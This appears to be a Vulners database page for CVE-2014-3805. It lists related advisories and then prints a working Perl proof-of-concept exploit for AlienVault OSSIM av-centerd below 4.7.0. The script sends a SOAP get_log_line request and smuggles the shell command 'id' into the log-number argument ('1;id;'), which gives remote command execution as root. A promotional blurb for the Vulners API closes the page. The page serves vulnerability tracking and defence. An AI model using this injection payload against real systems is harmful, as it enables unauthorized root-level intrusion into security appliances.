| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Alienvault OSSIM av-centerd 4.7.0 - (get_log_line) Command Injection Exploit | 13 Sep 201700:00 | – | zdt | |
| CVE-2014-3805 | 18 Jun 201400:00 | – | circl | |
| AlienVault OSSIM av-centerd Util.pm get_license Arbitrary Command Execution (CVE-2014-3805) | 20 Jul 201400:00 | – | checkpoint_advisories | |
| CVE-2014-3805 | 13 Jun 201414:00 | – | cve | |
| CVE-2014-3805 | 13 Jun 201414:00 | – | cvelist | |
| Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit) | 13 Sep 201700:00 | – | exploitdb | |
| Alienvault OSSIM av-centerd 4.7.0 - get_log_line Command Injection (Metasploit) | 13 Sep 201700:00 | – | exploitpack | |
| Alienvault Open Source SIEM (OSSIM) 4.7.0 - av-centerd get_log_line() Remote Code Execution | 18 Jun 201400:00 | – | exploitpack | |
| CVE-2014-3805 | 13 Jun 201414:55 | – | nvd | |
| AlienVault OSSIM Multiple RCE Vulnerabilities | 20 Jun 201400:00 | – | openvas |
# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
# Date: 06/17/2014
# Exploit Author: Alfredo Ramirez
# Vendor Homepage: http://www.alienvault.com/
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
# Version: < 4.7.0
# Tested on: Debian/Virtual Appliance
# CVE : CVE-2014-3805
#!perl -w
use SOAP::Lite;
# SSL is self-signed so we have to ignore verification.
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
# We simply append the 'id' command to the number of log we want to
# read.
@soap_response = SOAP::Lite
-> uri('AV/CC/Util')
-> proxy('https://172.26.22.2:40007/av-centerd')
-> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
-> result;
for (@{ $soap_response[0] }) {
print "$_\n";
}
# If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation